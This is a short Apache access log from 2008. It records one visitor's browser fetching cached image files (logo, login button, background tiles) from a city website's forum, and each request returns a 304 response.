121.1.55.18 - - [28/Aug/2008:06:00:22 -0700] "GET /forum2/style_images/2_2_sccilogobluebkgrd.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?&&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:00:22 -0700] "GET /forum2/style_images/red_crysta/login-button.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?&&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:00:22 -0700] "GET /forum2/style_images/red_crysta/tile_back.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?&&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:00:22 -0700] "GET /forum2/style_images/red_crysta/tile_sub.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?&&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:00:23 -0700] "GET /forum2/style_images/red_crysta/tile_sub-lite.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?&&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
